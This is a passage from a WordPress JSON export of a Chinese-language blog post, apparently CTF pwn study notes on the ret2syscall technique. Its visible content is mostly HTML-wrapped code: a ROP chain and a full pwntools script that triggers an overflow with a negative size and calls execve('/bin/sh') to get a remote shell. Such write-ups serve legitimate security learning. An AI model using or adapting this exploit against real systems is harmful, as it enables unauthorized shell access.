stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>p64(pop_rax) + p64(59) + p64(pop_rdi) + p64(sh) + p64(pop_rsi) + p64(0) + p64(pop_rdx_pop_rbx) + p64(0) + p64(0) + p64(syscall)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rax<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">59<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span 
style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rsi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdx_pop_rbx<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span 
style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">syscall<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7531\u6b64\u53ef\u4ee5\u5f97\u5230\u6700\u7ec8\u7684\u653b\u51fb\u4ee3\u7801\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"ip\", port)    \n\npop_rdi = 0x40264f  \npop_rax = 0x458827  \npop_rsi = 0x40a67e  \npop_rdx_pop_rbx = 0x4a404b  \nsyscall = 0x402404  \nsh = 0x4E60F0  \n\np.sendlineafter(b'> ', b'1')  \np.recv()  \np.sendline(b'1')  \np.recv()  \np.sendline(b'-1000000')  \n\np.sendlineafter(b'> ', b'4')  \np.sendlineafter(b'> ', b'5')  \n\npayload = b'\/bin\/sh\\x00' + b'a' * (0x20 - 8) + b'=Triode=' + p64(pop_rax) + p64(59) + p64(pop_rdi) + 
p64(sh) + p64(pop_rsi) + p64(0) + p64(pop_rdx_pop_rbx) + p64(0) + p64(0) + p64(syscall)  \n\np.recv()  \np.sendline(payload)  \n\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">    <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: 
#B48EAD\">40264f<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rax <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">458827<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rsi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40a67e<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdx_pop_rbx <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4a404b<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">syscall <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">402404<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4E60F0<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">&gt; <\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: 
#D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">1<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recv<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">1<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recv<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">-1000000<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span 
style=\"color: #A3BE8C\">&gt; <\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">4<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">&gt; <\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">5<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span 
style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rax<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">59<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: 
#D8DEE9FF\">pop_rsi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdx_pop_rbx<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">syscall<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recv<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: 
#88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-49.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-49.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"410\" height=\"424\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-182\"  sizes=\"auto, (max-width: 410px) 100vw, 410px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5728\u4e00\u4e9b\u60c5\u51b5\u4e0b\u4e5f\u53ef\u4ee5\u901a\u8fc7ret2syscall\u6784\u9020\u5176\u4ed6\u7cfb\u7edf\u8c03\u7528\uff08\u800c\u4e0d\u53ea\u662fexecve\uff09\u6765\u8fbe\u5230\u76ee\u6807\uff0c\u5728\u6b64\u5c31\u4e0d\u8fc7\u591a\u8d58\u8ff0\u4e86\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pwn\u65b9\u5411ret2\u7cfb\u5217\u5b66\u4e60\u7b14\u8bb0<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[14],"class_list":["post-149","post","type-post","status-publish","format-standard","hentry","category-pwn","tag-pwn"],"_links":{"self":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts\/149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/comments?post=149"}],"version-history":[{"count":5,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts\/149\/revisions"}],"predecessor-version":[{"id":186,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts\/149\/revisions\/186"}],"wp:attachment":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/media?parent=149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/categories?post=149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/tags?post=149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}